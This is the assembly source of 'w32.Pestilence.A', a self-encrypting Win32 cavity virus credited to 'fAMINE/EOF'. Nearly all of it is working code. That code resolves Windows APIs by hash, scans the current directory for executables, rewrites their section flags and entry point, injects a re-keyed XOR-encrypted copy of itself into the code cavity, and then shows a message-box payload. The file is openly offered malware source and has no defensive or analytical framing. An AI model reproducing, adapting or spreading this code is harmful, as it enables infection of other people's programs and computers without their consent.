; Pestilence.asm

.386
.Model flat, stdcall
Option casemap:none

Include Pestilence.inc

Include \masm32\include\windows.inc

Includelib \masm32\lib\kernel32.lib ; ExitProcess
Includelib \masm32\lib\user32.lib ; MessageBoxA

; w32.Pestilence.A
; Windows Encrypted Non-Fractioned Cavity Virus
;
; Well, here's my tiny, optimized, Win32 non-fractioned cavity virus: Pestilence.
; The idea here was to have a  small Windows virus that did not change the size of 
; its host, and took few enough bytes to fit into the  average PE cavity. The virus
; encrypts itself with a random new key every time that it infects a new host, and
; Displays a message box (the payload) when it infects a new file. In total, the 
; full virus amounts to 355 bytes, however with the payload it ends up being 427.
; It uses no hardcoded addresses, works on  all NT systems and infects one MZ binary
; in the current directory per execution.
;
; If an executable does not have enough space in its code cavity to accomodate the
; virus, it is skipped.
;
; Prequisites: main executable must have the system attribute, and must have the
; write-privilege flag set on its code segment.
;   
; fAMINE/EOF

.Code

VirusCode:
                
    PestilenceAop:
               
    Call    PestilenceDecoder
    
    PestilenceDecoder:
    
    Pop     Esi
    Add     Si, (PestilenceMain - PestilenceDecoder)
    Mov     Edi, Esi
    Mov     Ecx, (PestilenceEndMain - PestilenceMain)
    
    PestilenceDecodeByte:
    
    Lodsb
    Xor     Al, 00h
    Stosb
    Loop    PestilenceDecodeByte

    PestilenceMain:
    
    Push    0583C436Ch ; LoadLibraryA
    Push    0079AAC1Eh ; FindFirstFileA    
    Push    04128BB03h ; CreateFileMappingA
    Push    07A44DC56h ; SetFileAttributesA
    Push    025339452h ; CreateFileA
    Push    055188A55h ; FindNextFileA
    Push    0F36F1F2Ch ; MapViewOfFile
    
    PestilenceResolveApi:
    
    Mov     Edi, Esp
    Mov     Cl, 07h
    
    PestilenceNextFunction:
    
    Push    Dword Ptr [Edi]
    Mov     Eax, Dword Ptr [Ebx + 0Ch]
    Mov     Esi, Dword Ptr [Eax + 1Ch]
    Lodsd
    Mov     Eax, Dword Ptr [Eax + 08h]
    Call    PestilenceResolveFunctionAddress
    Stosd
    Loop    PestilenceNextFunction
    Lea     Ebp, [Esp + 1Ch]
    
    PestilenceFindFirst:
     
    Push    "*"
    Mov     Ebx, Esp
    Sub     Sp, 140h ; Stack-alligned WIN32_FIND_DATA
    Mov     Esi, Esp
    Push    Esi
    Push    Ebx
    Call    Dword Ptr [Ebp + FindFirstFile]
    Mov     Edi, Eax

    PestilenceFindNext:

    Push    Esi
    Push    Edi
    Call    Dword Ptr [Ebp + FindNextFile]
    Test    Al, Al
    Jz      PestilenceBeginPayload
    Test    Byte Ptr [Esi], (FILE_ATTRIBUTE_DIRECTORY + FILE_ATTRIBUTE_SYSTEM)
    Jne     PestilenceFindNext
    Lea     Ebx, Dword Ptr [Esi + 2Ch]
    
    PestilenceBeginInfection:
    
    Push    FILE_ATTRIBUTE_SYSTEM
    Push    Ebx
    Call    Dword Ptr [Ebp + SetFileAttributes]
    Xor     Esi, Esi
    Push    Ebx
    Push    Esi
    Push    FILE_ATTRIBUTE_NORMAL
    Push    OPEN_EXISTING
    Push    Esi
    Push    Esi
    Push    (GENERIC_READ + GENERIC_WRITE)
    Push    Ebx
    Call    Dword Ptr [Ebp + CreateFile]
    Test    Al, Al
    Jz      PestilenceFindFirst
    Push    Esi
    Push    Esi
    Push    Esi
    Push    PAGE_READWRITE
    Push    Esi
    Push    Eax
    Call    Dword Ptr [Ebp + CreateFileMapping]
    Push    Esi
    Push    Esi
    Push    Esi
    Push    FILE_MAP_ALL_ACCESS
    Push    Eax
    Call    Dword Ptr [Ebp + MapViewOfFile]
    Cmp     Word Ptr [Eax], "ZM"
    Jne     PestilenceFindFirst
    Mov     Ecx, Eax
    Mov     Esi, Dword Ptr [Ecx + 3Ch]
    Add     Esi, Ecx ; PE header
    Mov     Eax, Dword Ptr [Esi + 74h]
    Shl     Eax, 03h
    Add     Eax, Esi ; PE offset
    Add     Eax, 78h ; PE size
    Or      Dword Ptr [Eax + 24h], 0A0000020h
    Mov     Ebx, Dword Ptr [Eax + 08h] ; VirtualSize
    Mov     Edx, Ebx ; Next generation key
    Mov     Edi, Dword Ptr [Eax + 10h] ; SizeOfRawCode
    Sub     Edi, Ebx
    Cmp     Edi, (PestilenceEndMain - PestilenceAop)
    Jl      PestilenceFindFirst                                              
    Mov     Edi, Ebx
    Add     Edi, Dword Ptr [Eax + 14h] ; PointerToRawData
    Add     Edi, Ecx
    Add     Ebx, Dword Ptr [Eax + 0Ch] ; VirtualAddress
    Xchg    Dword Ptr [Esi + 28h], Ebx ; AddressOfEntryPoint
    Add     Ebx, Dword Ptr [Esi + 34h] ; ImageBase
    Call    PestilenceWriteVirus
    
    PestilenceWriteVirus:
                     
    Pop     Esi ; Get Eip
    Sub     Si, (PestilenceWriteVirus - PestilenceAop)
    Xchg    Dword Ptr [Esi + ((PestilenceJmpOep - PestilenceAop) + 01h)], Ebx
    Mov     Ecx, (PestilenceEndMain - PestilenceAop)
    
    PestilenceWriteByte:
                        
    Lodsb
    Cmp     Ecx, (((PestilenceEndMain - PestilenceAop) - (PestilenceMain - PestilenceAop) + 01h))
    Jge     PestilenceSkipByte
    Xor     Al, Dl
    
    PestilenceSkipByte:
    
    Stosb
    Loop    PestilenceWriteByte
    
    PestilenceCompleteInfection:
    
    Mov     Byte Ptr [Edi - (PestilenceEndMain - PestilenceDecodeByte) + 02h], Dl ; New key
    Mov     Dword Ptr [Esi - (PestilenceEndMain - PestilenceJmpOep - 01h)], Ebx
    
    PestilenceBeginPayload:
    
    Push    "23"
    Push    "resU"
    Push    Esp
    Call    Dword Ptr [Ebp + LoadLibrary]
    Push    01361C78Eh ; MessageBoxA
    Call    PestilenceResolveFunctionAddress
    Xor     Ebx, Ebx
    Push    Ebx
    Push    Ebx
    Call    PestilenceExecutePayload
    Db      "w32.PeSTiLeNCe.A bY fAMINE/EOF", 00h
    
    PestilenceExecutePayload:
                      
    Push    Ebx
    Call    Eax
    
    PestilenceJmpOep:
    
    Mov     Eax, PestilenceEndMain
    Jmp     Eax ; Return to oep of host
    
    PestilenceResolveFunctionAddress:

    Push    Ebx ; PEB
    Push    Eax
    Mov     Ebp, Eax
    Mov     Ebx, Eax
    Add     Eax, Dword Ptr [Eax + 3Ch] 
    Add     Ebx, Dword Ptr [Eax + 78h] ; Export directory
    Mov     Edx, Dword Ptr [Ebx + 1Ch] ; Addresses
    Add     Edx, Ebp
    Mov     Esi, Dword Ptr [Ebx + 20h] ; Names
    Mov     Esi, Dword Ptr [Esi + Ebp * 01h]
    Add     Esi, Ebp ; Function name
    Xor     Ebx, Ebx

    PestilenceGenerateFunctionHash:  

    Xor     Ebp, Ebp
    Xor     Eax, Eax

    PestilenceNextByte:
                                                            
    Lodsb     
    Test    Al, Al
    Jz      PestilenceEndHashGenerator
    Ror     Ebp, 0Fh
    Add     Ebp, Eax
    Jmp     PestilenceNextByte
    
    PestilenceEndHashGenerator:
    
    Inc     Ebx
    Cmp     Ebp, Dword Ptr [Esp + 0Ch] ; Target hash
    Jne     PestilenceGenerateFunctionHash
    Dec     Ebx
    Mov     Eax, Dword Ptr [Edx + Ebx * 04h]
    Pop     Ebx
    Add     Eax, Ebx
    Pop     Ebx
    Ret
    
    PestilenceEndMain: 
                       
    ; The following code is activated on first-time execution only,
    ; and is only contained within this compiled executable.
                                
    Xor     Eax, Eax
    Push    Eax
    Push    Eax
    Call    PestilenceMessageTitle
    Db      "w32.Pestilence.A by fAMINE/EOF", 00h  
    
    PestilenceMessageTitle:
                                
    Call    PestilenceMessageBody 
    Db      "Virus was successfully activated.", 00h  
    
    PestilenceMessageBody:
                                
    Push    Eax
    Call    [MessageBoxA]    
    Push    Eax
    Call    [ExitProcess]
                              
End VirusCode
